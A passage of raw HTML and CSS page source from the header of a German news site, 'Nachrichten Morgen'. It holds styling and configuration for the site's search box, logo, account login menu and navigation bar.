.tdb-drop-down-search-inner{left:-92px}.tdi_51 .tdb-drop-down-search .tdb-drop-down-search-inner{max-width:800px}.tdi_51 .td_module_wrap{padding-bottom:7.5px!important;margin-bottom:7.5px!important;padding-bottom:7.5px;margin-bottom:7.5px}.tdi_51 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_51 .td_module_wrap .td-module-container:before{display:block!important}.tdi_51 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_51 .td-module-container:before{bottom:-7.5px}.tdi_51 .td-module-meta-info{padding:0 0 0 10px}.tdi_51 .entry-title{margin:0 0 6px 0;font-size:14px!important}.tdi_51 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_51 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_51 .tdb-head-search-btn i{font-size:15px}.tdi_51 .tdb-head-search-btn svg{width:15px}.tdi_51 .tdb-head-search-btn i{width:24px;height:24px;line-height:24px}.tdi_51 .tdb-search-icon-svg{width:24px;height:24px}.tdi_51 .tdb-drop-down-search-inner{left:-74px}.tdi_51 .tdb-drop-down-search .tdb-drop-down-search-inner{max-width:700px}.tdi_51 .tdb-head-search-form-btn svg{width:10px}.tdi_51 .tdb-aj-search-results{padding:20px 20px}.tdi_51 .result-msg{padding:7px}.tdi_51 .tdb-search-txt{font-size:13px!important}.tdi_51 .tdb-head-search-form-input{font-size:13px!important}.tdi_51 .tdb-head-search-placeholder{font-size:13px!important}.tdi_51 .td_module_wrap{padding-bottom:7.5px!important;margin-bottom:7.5px!important;padding-bottom:7.5px;margin-bottom:7.5px}.tdi_51 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_51 .td_module_wrap .td-module-container:before{display:block!important}.tdi_51 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_51 .td-module-container:before{bottom:-7.5px}.tdi_51 .td-module-meta-info{padding:0 0 0 10px}.tdi_51 .entry-title{margin:0 0 4px 0;font-size:11px!important}.tdi_51 .td-post-category{margin:0 3px 0 0;font-size:11px!important}.tdi_51 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_51 .td-editor-date,.tdi_51 .td-editor-date .td-post-author-name,.tdi_51 .td-module-comments a{font-size:11px!important}@media (min-width:768px){.tdi_51 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_51 .td_module_wrap{padding-bottom:10px!important;margin-bottom:10px!important}.tdi_51 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_51 .td_module_wrap .td-module-container:before{display:block!important}.tdi_51 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_51 .td_module_wrap{padding-bottom:10px;margin-bottom:10px}.tdi_51 .td-module-container:before{bottom:-10px}.tdi_51 .entry-title{margin:0px;font-size:20px!important}.tdi_51 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_51 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><div class="tdb-block-inner td-fix-index"><div class="tdb-drop-down-search" aria-labelledby="td-header-search-button"><div class="tdb-drop-down-search-inner"><form method="get" class="tdb-search-form" action="https://nachrichtenmorgen.de/"><div class="tdb-search-form-inner"><input class="tdb-head-search-form-input" placeholder=" " type="text" value="" name="s" autocomplete="off" /><button class="wpb_button wpb_btn-inverse btn tdb-head-search-form-btn" title="Search" type="submit"><span>Suche</span></button></div></form><div class="tdb-aj-search"></div></div></div><a href="#" role="button" aria-label="Search" class="tdb-head-search-btn dropdown-toggle" data-toggle="dropdown"><span class="tdb-search-txt">Suchen</span><span class="tdb-search-icon tdb-search-icon-svg" ><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024"><path d="M946.371 843.601l-125.379-125.44c43.643-65.925 65.495-142.1 65.475-218.040 0.051-101.069-38.676-202.588-115.835-279.706-77.117-77.148-178.606-115.948-279.644-115.886-101.079-0.061-202.557 38.738-279.665 115.876-77.169 77.128-115.937 178.627-115.907 279.716-0.031 101.069 38.728 202.588 115.907 279.665 77.117 77.117 178.616 115.825 279.665 115.804 75.94 0.020 152.136-21.862 218.061-65.495l125.348 125.46c30.915 30.904 81.029 30.904 111.954 0.020 30.915-30.935 30.915-81.029 0.020-111.974zM705.772 714.925c-59.443 59.341-136.899 88.842-214.784 88.924-77.896-0.082-155.341-29.583-214.784-88.924-59.443-59.484-88.975-136.919-89.037-214.804 0.061-77.885 29.604-155.372 89.037-214.825 59.464-59.443 136.878-88.945 214.784-89.016 77.865 0.082 155.3 29.583 214.784 89.016 59.361 59.464 88.914 136.919 88.945 214.825-0.041 77.885-29.583 155.361-88.945 214.804z"></path></svg></span></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_53  wpb_column vc_column_container tdc-column td-pb-span6">
  482. <style scoped>.tdi_53{vertical-align:baseline}.tdi_53>.wpb_wrapper,.tdi_53>.wpb_wrapper>.tdc-elements{display:block}.tdi_53>.wpb_wrapper>.tdc-elements{width:100%}.tdi_53>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_53>.wpb_wrapper{width:auto;height:auto}.tdi_53{width:40%!important}@media (min-width:768px) and (max-width:1018px){.tdi_53{width:34%!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap td_block_raw_css tdi_54 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_54" ><div id=tdi_54 class="td_block_inner td-fix-index"><style>.td_flex_block_1.td-week-slider .td-next-prev-wrap {
  483.  position: absolute;
  484.  top: 5px;
  485.  width: 100%;
  486.  height: 40px;
  487.  z-index: -1;
  488. }
  489. @media (min-width: 1019px) and (max-width: 1140px) {
  490.  .td_flex_block_1.td-week-slider .td-next-prev-wrap {
  491.    top: 12px;
  492.  }
  493. }
  494. @media (min-width: 768px) and (max-width: 1018px) {
  495.  .td_flex_block_1.td-week-slider .td-next-prev-wrap {
  496.    top: 10px;
  497.  }
  498. }
  499. @media (max-width: 767px) {
  500.  .td_flex_block_1.td-week-slider .td-next-prev-wrap {
  501.    top: 45%;
  502.  }
  503. }
  504. .td_flex_block_1.td-week-slider .td-next-prev-wrap a {
  505.  margin: 0;
  506.  min-width: 36px;
  507.  min-height: 36px;
  508.  position: absolute;
  509. }
  510. .td_flex_block_1.td-week-slider .td-next-prev-wrap a.ajax-page-disabled {
  511.  opacity: 1;
  512. }
  513. .td_flex_block_1.td-week-slider .td-next-prev-wrap a i {
  514.  line-height: 36px;
  515. }
  516. .td_flex_block_1.td-week-slider .td-next-prev-wrap a.td-ajax-prev-page {
  517.  left: -60px;
  518. }
  519. .td_flex_block_1.td-week-slider .td-next-prev-wrap a.td-ajax-next-page {
  520.  right: -60px;
  521. }
  522. </style></div></div><div class="td_block_wrap tdb_header_logo tdi_55 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_55" >
  523. <style>.tdi_55{margin-top:-5px!important;padding-top:5px!important;padding-bottom:5px!important;padding-left:5px!important;z-index:0!important}@media (min-width:768px) and (max-width:1018px){.tdi_55{padding-top:10px!important;padding-bottom:10px!important}}</style>
  524. <style>.tdi_55 .tdb-logo-a,.tdi_55 h1{flex-direction:row}.tdi_55 .tdb-logo-a,.tdi_55 h1{align-items:flex-end;justify-content:center}.tdi_55 .tdb-logo-svg-wrap{max-width:;display:block}.tdi_55 .tdb-logo-svg-wrap svg{width:;height:auto}.tdi_55 .tdb-logo-svg-wrap+.tdb-logo-img-wrap{display:none}.tdi_55 .tdb-logo-img{max-width:150px}.tdi_55 .tdb-logo-img-wrap{margin-top:0px;margin-bottom:0px;margin-right:5px;margin-left:0px}.tdi_55 .tdb-logo-img-wrap:first-child{margin-top:0;margin-left:0}.tdi_55 .tdb-logo-img-wrap:last-child{margin-bottom:0;margin-right:0}.tdi_55 .tdb-logo-text-tagline{margin-top:0;margin-left:0px;color:#000000;font-family:Work Sans!important;font-size:12px!important;line-height:4.6!important;font-style:italic!important;font-weight:500!important;}.tdi_55 .tdb-logo-text-wrap{flex-direction:row;align-items:baseline}.tdi_55 .tdb-logo-icon-svg svg{width:25px}.tdi_55 .tdb-logo-icon{top:0px;display:none}.tdi_55 .tdb-logo-text-title{color:#ec3535;font-family:PT Serif!important;font-size:50px!important;line-height:1.2!important;font-style:normal!important;font-weight:500!important;letter-spacing:-5px!important;}@media (min-width:1019px) and (max-width:1140px){.tdi_55 .tdb-logo-img{max-width:260px}.tdi_55 .tdb-logo-text-title{font-size:70px!important;letter-spacing:-3px!important;}.tdi_55 .tdb-logo-text-tagline{line-height:3.2!important;letter-spacing:0.5px!important;}}@media (min-width:768px) and (max-width:1018px){.tdi_55 .tdb-logo-img{max-width:180px}.tdi_55 .tdb-logo-icon{top:3px}.tdi_55 .tdb-logo-text-title{font-size:45px!important;letter-spacing:-2px!important;}.tdi_55 .tdb-logo-text-tagline{font-size:11px!important;line-height:2.5!important;letter-spacing:0px!important;}}</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://nachrichtenmorgen.de/"><h1><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">Nachrichten Morgen</span><span class="tdb-logo-text-tagline"> </span></span></h1></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_57  wpb_column vc_column_container tdc-column td-pb-span3">
  525. <style scoped>.tdi_57{vertical-align:baseline}.tdi_57>.wpb_wrapper,.tdi_57>.wpb_wrapper>.tdc-elements{display:block}.tdi_57>.wpb_wrapper>.tdc-elements{width:100%}.tdi_57>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_57>.wpb_wrapper{width:auto;height:auto}.tdi_57{width:30%!important;justify-content:flex-end!important;text-align:right!important}@media (min-width:768px) and (max-width:1018px){.tdi_57{width:33%!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tds_menu_login tdi_58  td_block_template_1"  data-td-block-uid="tdi_58" >
  526. <style>.tdi_58{margin-bottom:0px!important}</style>
  527. <style>.tds_menu_login{vertical-align:middle;z-index:1001}.tds_menu_login .tdw-block-inner{font-size:0;line-height:0}.tds_menu_login .tdw-wml-wrap{position:relative}.tds_menu_login .tdw-wml-link{position:relative;display:flex;flex-wrap:wrap;cursor:pointer}.tds_menu_login .tdw-wml-icon-wrap{position:relative}.tds_menu_login .tdw-wml-icon{display:block;color:#000}.tds_menu_login .tdw-wml-icon-svg{line-height:0}.tds_menu_login .tdw-wml-avatar{position:relative;display:block;width:25px;height:25px;background-repeat:no-repeat;background-size:cover;background-position:center;border-radius:100px}.tds_menu_login .tdw-wml-user{position:relative;display:flex;align-items:center;font-size:13px;color:#000}.tds_menu_login .tdw-wml-menu{position:relative;width:100%;font-size:13px;line-height:1.2;font-size:14px;line-height:21px;z-index:10}.tds_menu_login .tdw-wml-menu-inner{background-color:#fff;border-width:0;border-style:solid;border-color:#000;position:relative}.tds_menu_login .tdw-wml-menu-header,.tds_menu_login .tdw-wml-menu-footer{padding:11px 20px}.tds_menu_login .tdw-wml-menu-header{border-bottom:1px solid #eaeaea}.tds_menu_login .tdw-wml-menu-content{padding:10px 20px}.tds_menu_login .tdw-wml-menu-list{list-style-type:none;margin:0}.tds_menu_login .tdw-wml-menu-list li{margin-left:0;line-height:2.2}.tds_menu_login .tdw-wml-menu-list .tdw-wml-menu-item-sep{height:1px;margin:8px 0;background-color:#eaeaea}.tds_menu_login .tdw-wml-menu-list li a,.tds_menu_login .tdw-wml-menu-footer a{color:#000}.tds_menu_login .tdw-wml-menu-list li a:hover,.tds_menu_login .tdw-wml-menu-list a.is-active,.tds_menu_login .tdw-wml-menu-footer a:hover{color:var(--td_theme_color,#4db2ec)}.tds_menu_login .tdw-wml-menu-footer{border-top:1px solid #eaeaea}.tds_menu_login .tdw-wml-menu-footer a{display:flex;align-items:center}.tds_menu_login .tdw-wml-menu-footer .tdw-wml-logout-icon{margin-left:7px}.tds_menu_login .tdw-wml-menu-footer .tdw-wml-logout-icon-svg{line-height:0}.tds_menu_login .tdw-wml-guest .tdw-wml-menu-content{display:flex;align-items:center;padding:15px 20px}.tds_menu_login .tdw-wml-guest .tdw-wml-menu-content a{font-size:11px;line-height:1}.tds_menu_login .tdw-wml-login-link{padding:9px 14px 11px;background-color:var(--td_theme_color,#4db2ec);color:#fff;border:0 solid #000}.tds_menu_login .tdw-wml-login-link:hover{background-color:#222}.tds_menu_login .tdw-wml-register-link{margin-left:12px;color:#000}.tds_menu_login .tdw-wml-register-link:hover{color:var(--td_theme_color,#4db2ec)}.tds_menu_login .tdw-wml-icon-wrap:after{content:'';display:none;position:absolute;bottom:-18px;left:50%;transform:translateX(-50%);width:0;height:0;border-left:6px solid transparent;border-right:6px solid transparent;border-bottom:6px solid #fff;z-index:11}.tds_menu_login .tdw-wml-wrap:hover .tdw-wml-icon-wrap:after{display:block}body .tdi_58 .tdw-wml-wrap{display:inline-block}body .tdi_58 .tdw-wml-wrap:hover .tdw-wml-menu{opacity:1;visibility:visible}body .tdi_58 .tdw-wml-menu{position:absolute;top:100%;right:0;left:6px;width:200px;opacity:0;visibility:hidden;left:0;right:auto;transform:none}body .tdi_58 .tdw-wml-menu:before{content:'';display:block;width:100%;height:18px;height:15px}body .tdi_58 .tdw-wml-menu-inner{margin-right:-12px;right:8%;box-shadow:0px 2px 6px 0px rgba(0,0,0,0.2)}body .tdi_58 .tdw-wml-icon{font-size:24px}body .tdi_58 .tdw-wml-avatar{display:block}body .tdi_58 .tdw-wml-icon-wrap,body .tdi_58 .tdw-wml-avatar{margin-right:8px}body .tdi_58 .tdw-wml-user{top:0px;display:flex;font-family:Work Sans!important;font-size:13px!important;font-weight:500!important}body .tdi_58 .td_block_inner{text-align:left}body .tdi_58{display:inline-block}body .tdi_58 .tdw-wml-avatar:after,body .tdi_58 .tdw-wml-icon-wrap:after,body .tdi_58 .tdw-wml-link:after{bottom:-15px}body .tdi_58 .tdw-wml-account .tdw-wml-menu-header{border-bottom-style:solid;font-family:Work Sans!important;font-size:13px!important;font-weight:500!important}body .tdi_58 .tdw-wml-menu-footer .tdw-wml-logout-icon{font-size:14px}body .tdi_58 .tdw-wml-menu-footer{border-top-style:solid}body .tdi_58 .tdw-wml-guest .tdw-wml-menu-header{border-bottom-style:solid;font-family:Work Sans!important;font-size:13px!important;font-weight:500!important}body .tdi_58 .tdw-wml-login-link{border-style:solid;border-radius:4px;background-color:#ec3535;font-family:Work Sans!important;font-size:13px!important;font-weight:500!important}body .tdi_58 .tdw-wml-menu-list li a{color:#000000}body .tdi_58 .tdw-wml-menu-list li a:hover,body .tdi_58 .tdw-wml-menu-list a.is-active{color:#ec3535}body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer a{color:#000000}body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer a .tdw-wml-logout-icon svg,body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer a .tdw-wml-logout-icon svg *{fill:#000000}body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer a:hover{color:#ec3535}body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer a:hover .tdw-wml-logout-icon svg,body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer a:hover .tdw-wml-logout-icon svg *{fill:#ec3535}body .tdi_58 .tdw-wml-login-link:hover{background-color:#000000}body .tdi_58 .tdw-wml-register-link{color:#000000;font-family:Work Sans!important;font-size:13px!important;font-weight:500!important}body .tdi_58 .tdw-wml-register-link:hover{color:#ec3535}body .tdi_58 .tdw-wml-menu-list li{font-family:Work Sans!important;font-size:13px!important;font-weight:500!important}body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer{font-family:Work Sans!important;font-size:13px!important;font-weight:500!important}@media (min-width:768px) and (max-width:1018px){body .tdi_58 .tdw-wml-user{font-size:12px!important}body .tdi_58 .tdw-wml-account .tdw-wml-menu-header{font-size:12px!important}body .tdi_58 .tdw-wml-menu-list li{font-size:12px!important}body .tdi_58 .tdw-wml-account .tdw-wml-menu-footer{font-size:12px!important}body .tdi_58 .tdw-wml-guest .tdw-wml-menu-header{font-size:12px!important}body .tdi_58 .tdw-wml-login-link{font-size:12px!important}body .tdi_58 .tdw-wml-register-link{font-size:12px!important}}</style><script type="rocketlazyloadscript">var block_tdi_58 = new tdBlock();
  528. block_tdi_58.id = "tdi_58";
  529. block_tdi_58.atts = '{"inline":"yes","guest_tdicon":"td-icon-profile","logout_tdicon":"td-icon-log-out","menu_gh_txt":"Get into your account.","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn19","f_uh_font_family":"653","f_links_font_family":"653","f_uf_font_family":"653","f_uh_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_links_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_uf_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_uh_font_weight":"500","f_links_font_weight":"500","f_uf_font_weight":"500","f_toggle_font_family":"653","f_toggle_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_toggle_font_weight":"500","ia_space":"8","menu_offset_top":"15","show_version":"","f_gh_font_family":"653","f_btn1_font_family":"653","f_btn2_font_family":"653","f_gh_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_btn1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_btn2_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_gh_font_weight":"500","f_btn1_font_weight":"500","f_btn2_font_weight":"500","menu_gc_btn1_bg_color":"#ec3535","menu_gc_btn1_bg_color_h":"#000000","menu_gc_btn2_color":"#000000","menu_gc_btn2_color_h":"#ec3535","menu_gc_btn1_radius":"4","menu_ul_link_color":"#000000","menu_ul_link_color_h":"#ec3535","menu_uf_txt_color":"#000000","menu_uf_txt_color_h":"#ec3535","show_menu":"yes","toggle_txt":"Mein Konto","block_type":"tds_menu_login","dropdown_only":"","disable_dropdown":"","separator":"","icon_size":"24","avatar_size":"","avatar_radius":"","show_avatar":"block","toggle_txt_pos":"","toggle_hide":"","toggle_txt_align":"0","toggle_horiz_align":"content-horiz-left","menu_offset_horiz":"8","menu_width":"","menu_padding":"","menu_border":"","menu_border_style":"","menu_border_radius":"","menu_horiz_align":"content-horiz-left","menu_uh_padd":"","menu_uh_border":"","menu_uh_border_style":"","menu_ul_padd":"","menu_ul_space":"","menu_ul_sep_space":"","menu_ulo_txt":"","logout_size":"14","logout_space":"","menu_ulo_padd":"","menu_ulo_border":"","menu_ulo_border_style":"","menu_gh_padd":"","menu_gh_border":"","menu_gh_border_style":"","menu_gc_padd":"","menu_gc_btn1_txt":"","menu_gc_btn1_padd":"","menu_gc_btn1_border":"","menu_gc_btn1_border_style":"","menu_gc_btn2_txt":"","menu_gc_btn2_space":"","pages_header":"","page_0_url":"","page_0_title":"","page_1_url":"","page_1_title":"","page_2_url":"","page_2_title":"","page_3_url":"","page_3_title":"","page_4_url":"","page_4_title":"","icon_color":"","icon_color_h":"","toggle_txt_color":"","toggle_txt_color_h":"","hide_for_user_type":"","logged_plan_id":"","author_plan_id":"","f_toggle_font_header":"","f_toggle_font_title":"Toggle text","f_toggle_font_settings":"","f_toggle_font_line_height":"","f_toggle_font_style":"","f_toggle_font_transform":"","f_toggle_font_spacing":"","f_toggle_":"","menu_bg":"","menu_border_color":"","menu_arrow_color":"","menu_shadow_shadow_header":"","menu_shadow_shadow_title":"Shadow","menu_shadow_shadow_size":"","menu_shadow_shadow_offset_horizontal":"","menu_shadow_shadow_offset_vertical":"","menu_shadow_shadow_spread":"","menu_shadow_shadow_color":"","menu_uh_color":"","menu_uh_border_color":"","menu_ul_sep_color":"","menu_uf_icon_color":"","menu_uf_icon_color_h":"","menu_uf_border_color":"","f_uh_font_header":"","f_uh_font_title":"Header text","f_uh_font_settings":"","f_uh_font_line_height":"","f_uh_font_style":"","f_uh_font_transform":"","f_uh_font_spacing":"","f_uh_":"","f_links_font_title":"Links text","f_links_font_settings":"","f_links_font_line_height":"","f_links_font_style":"","f_links_font_transform":"","f_links_font_spacing":"","f_links_":"","f_uf_font_title":"Footer text","f_uf_font_settings":"","f_uf_font_line_height":"","f_uf_font_style":"","f_uf_font_transform":"","f_uf_font_spacing":"","f_uf_":"","menu_gh_color":"","menu_gh_border_color":"","menu_gc_btn1_color":"","menu_gc_btn1_color_h":"","menu_gc_btn1_border_color":"","menu_gc_btn1_border_color_h":"","f_gh_font_header":"","f_gh_font_title":"Header text","f_gh_font_settings":"","f_gh_font_line_height":"","f_gh_font_style":"","f_gh_font_transform":"","f_gh_font_spacing":"","f_gh_":"","f_btn1_font_title":"Login button text","f_btn1_font_settings":"","f_btn1_font_line_height":"","f_btn1_font_style":"","f_btn1_font_transform":"","f_btn1_font_spacing":"","f_btn1_":"","f_btn2_font_title":"Signup button text","f_btn2_font_settings":"","f_btn2_font_line_height":"","f_btn2_font_style":"","f_btn2_font_transform":"","f_btn2_font_spacing":"","f_btn2_":"","el_class":"","block_template_id":"","td_column_number":1,"header_color":"","ajax_pagination_infinite_stop":"","offset":"","limit":"5","td_ajax_preloading":"","td_ajax_filter_type":"","td_filter_default_txt":"","td_ajax_filter_ids":"","color_preset":"","ajax_pagination":"","ajax_pagination_next_prev_swipe":"","border_top":"","css":"","class":"tdi_58","tdc_css_class":"tdi_58","tdc_css_class_style":"tdi_58_rand_style"}';
  530. block_tdi_58.td_column_number = "1";
  531. block_tdi_58.block_type = "tds_menu_login";
  532. block_tdi_58.post_count = "5";
  533. block_tdi_58.found_posts = "3784";
  534. block_tdi_58.header_color = "";
  535. block_tdi_58.ajax_pagination_infinite_stop = "";
  536. block_tdi_58.max_num_pages = "757";
  537. tdBlocksArray.push(block_tdi_58);
  538. </script><div id=tdi_58 class="tdw-block-inner"><div class="tdw-wml-wrap"><div class="tdw-wml-link tdw-wml-popup"><div class="tdw-wml-icon-wrap"><i class="tdw-wml-icon td-icon-profile"></i></div><span class="tdw-wml-user">Mein Konto</span></div><div class="tdw-wml-menu tdw-wml-guest"><div class="tdw-wml-menu-inner"><div class="tdw-wml-menu-header">Get into your account.</div><div class="tdw-wml-menu-content"><a class="tdw-wml-login-link tdw-wml-popup" href="https://nachrichtenmorgen.de/">Anmeldung</a></div></div></div></div></div></div> <!-- ./block --></div></div></div></div><div id="tdi_59" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_60  wpb_row td-pb-row tdc-element-style" >
  539. <style scoped>.tdi_60,.tdi_60 .tdc-columns{min-height:0}.tdi_60,.tdi_60 .tdc-columns{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}.tdi_60 .tdc-columns{width:100%}.tdi_60{position:relative}.tdi_60 .td_block_wrap{text-align:left}</style>
  540. <div class="tdi_59_rand_style td-element-style" ><div class="td-element-style-before"><style>.tdi_59_rand_style>.td-element-style-before{content:''!important;width:100%!important;height:100%!important;position:absolute!important;top:0!important;left:0!important;display:block!important;z-index:0!important;border-color:#eaeaea!important;border-style:solid!important;border-width:1px 0px 0px 0px!important;background-size:cover!important;background-position:center top!important}</style></div><style>.tdi_59_rand_style{background-color:#ffffff!important}</style></div><div class="vc_column tdi_62  wpb_column vc_column_container tdc-column td-pb-span12">
  541. <style scoped>.tdi_62{vertical-align:baseline}.tdi_62>.wpb_wrapper,.tdi_62>.wpb_wrapper>.tdc-elements{display:block}.tdi_62>.wpb_wrapper>.tdc-elements{width:100%}.tdi_62>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_62>.wpb_wrapper{width:auto;height:auto}.tdi_62{justify-content:center!important;text-align:center!important}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_header_menu tdi_63 tds_menu_active1 tds_menu_sub_active1 tdb-mm-align-screen td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_63"  style=" z-index: 999;">
  542. <style>.tdi_63{z-index:0!important}</style>
  543. <style>.tdb_header_menu{margin-bottom:0;z-index:999;clear:none}.tdb_header_menu .tdb-main-sub-icon-fake,.tdb_header_menu .tdb-sub-icon-fake{display:none}.rtl .tdb_header_menu .tdb-menu{display:flex}.tdb_header_menu .tdb-menu{display:inline-block;vertical-align:middle;margin:0}.tdb_header_menu .tdb-menu .tdb-mega-menu-inactive,.tdb_header_menu .tdb-menu .tdb-menu-item-inactive{pointer-events:none}.tdb_header_menu .tdb-menu .tdb-mega-menu-inactive>ul,.tdb_header_menu .tdb-menu .tdb-menu-item-inactive>ul{visibility:hidden;opacity:0}.tdb_header_menu .tdb-menu .sub-menu{font-size:14px;position:absolute;top:-999em;background-color:#fff;z-index:99}.tdb_header_menu .tdb-menu .sub-menu>li{list-style-type:none;margin:0;font-family:'Open Sans','Open Sans Regular',sans-serif}.tdb_header_menu .tdb-menu>li{float:left;list-style-type:none;margin:0}.tdb_header_menu .tdb-menu>li>a{position:relative;display:inline-block;padding:0 14px;font-weight:700;font-size:14px;line-height:48px;vertical-align:middle;text-transform:uppercase;-webkit-backface-visibility:hidden;color:#000;font-family:'Open Sans','Open Sans Regular',sans-serif}.tdb_header_menu .tdb-menu>li>a:after{content:'';position:absolute;bottom:0;left:0;right:0;margin:0 auto;width:0;height:3px;background-color:var(--td_theme_color,#4db2ec);-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0);-webkit-transition:width 0.2s ease;transition:width 0.2s ease}.tdb_header_menu .tdb-menu>li>a>.tdb-menu-item-text{display:inline-block}.tdb_header_menu .tdb-menu>li>a .tdb-menu-item-text,.tdb_header_menu .tdb-menu>li>a span{vertical-align:middle;float:left}.tdb_header_menu .tdb-menu>li>a .tdb-sub-menu-icon{margin:0 0 0 7px}.tdb_header_menu .tdb-menu>li>a .tdb-sub-menu-icon-svg{float:none;line-height:0}.tdb_header_menu .tdb-menu>li>a .tdb-sub-menu-icon-svg svg{width:14px;height:auto}.tdb_header_menu .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdb_header_menu .tdb-menu>li>a .tdb-sub-menu-icon-svg svg *{fill:#000}.tdb_header_menu .tdb-menu>li.current-menu-item>a:after,.tdb_header_menu .tdb-menu>li.current-menu-ancestor>a:after,.tdb_header_menu .tdb-menu>li.current-category-ancestor>a:after,.tdb_header_menu .tdb-menu>li.current-page-ancestor>a:after,.tdb_header_menu .tdb-menu>li:hover>a:after,.tdb_header_menu .tdb-menu>li.tdb-hover>a:after{width:100%}.tdb_header_menu .tdb-menu>li:hover>ul,.tdb_header_menu .tdb-menu>li.tdb-hover>ul{top:auto;display:block!important}.tdb_header_menu .tdb-menu>li.td-normal-menu>ul.sub-menu{top:auto;left:0;z-index:99}.tdb_header_menu .tdb-menu>li .tdb-menu-sep{position:relative;vertical-align:middle;font-size:14px}.tdb_header_menu .tdb-menu>li .tdb-menu-sep-svg{line-height:0}.tdb_header_menu .tdb-menu>li .tdb-menu-sep-svg svg{width:14px;height:auto}.tdb_header_menu .tdb-menu>li:last-child .tdb-menu-sep{display:none}.tdb_header_menu .tdb-menu-item-text{word-wrap:break-word}.tdb_header_menu .tdb-menu-item-text,.tdb_header_menu .tdb-sub-menu-icon,.tdb_header_menu .tdb-menu-more-subicon{vertical-align:middle}.tdb_header_menu .tdb-sub-menu-icon,.tdb_header_menu .tdb-menu-more-subicon{position:relative;top:0;padding-left:0}.tdb_header_menu .tdb-normal-menu{position:relative}.tdb_header_menu .tdb-normal-menu ul{left:0;padding:15px 0;text-align:left}.tdb_header_menu .tdb-normal-menu ul ul{margin-top:-15px}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item{position:relative;list-style-type:none}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item>a{position:relative;display:block;padding:7px 30px;font-size:12px;line-height:20px;color:#111}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon,.tdb_header_menu .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon{position:absolute;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%);right:0;padding-right:inherit;font-size:7px;line-height:20px}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon-svg,.tdb_header_menu .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon-svg{line-height:0}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon-svg svg,.tdb_header_menu .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon-svg svg{width:7px;height:auto}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon-svg svg,.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon-svg svg *,.tdb_header_menu .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon svg,.tdb_header_menu .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon svg *{fill:#000}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item:hover>ul,.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item.tdb-hover>ul{top:0;display:block!important}.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item.current-menu-item>a,.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item.current-menu-ancestor>a,.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item.current-category-ancestor>a,.tdb_header_menu .tdb-normal-menu ul .tdb-menu-item.current-page-ancestor>a,.tdb_header_menu .tdb-normal-menu ul 